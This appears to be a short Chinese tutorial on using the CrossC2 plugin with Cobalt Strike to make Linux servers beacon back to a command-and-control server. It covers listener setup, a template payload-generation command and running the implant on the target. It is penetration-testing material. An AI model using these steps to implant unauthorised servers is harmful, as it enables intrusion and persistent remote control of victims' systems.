1、背景

一般CS用于Windows的后渗透，功能十分强大，是测试人员手中的利器，但是有些遗憾的是其不支持Linux服务器的后渗透，于是一款针对CS上线Linux的插件应运而生，本文简单介绍下如何使用CrossC2上线Linux服务器，达到Windows和Linux通吃。

2、工具

本文使用的CS为4.1版本，其他版本后续会进行测试；
附上CrossC2链接：https://github.com/gloxec/CrossC2

3、过程

按照一贯流程，首先进行CS服务端的部署，本文中使用kali作为CS服务端，将下面两个文件复制到CS根目录：

CrossC2.cna
genCrossC2.Linux

修改CrossC2.cna文件，将CC2路径修改为完整的真实路径（如果仅通过执行后门文件的方式上线，可忽略此步骤）：

将Server端的.cobaltstrike.beacon_keys文件复制到客户端根目录：

CrossC2当前只支持HTTPS监听器，需要在客户端先建立HTTPS监听：

创建好监听器后，使用如下命令在服务端生成Linux上线Payload：

./genCrossC2.Linux [host] [port] [getURI] [postURI] [platform] [arch] [outputFileName]

将生成的Payload上传到目标服务器，赋予执行权限，执行该文件；

在客户端进行查看，可以看到该主机成功上线，至此实现了Linux系统的CS上线：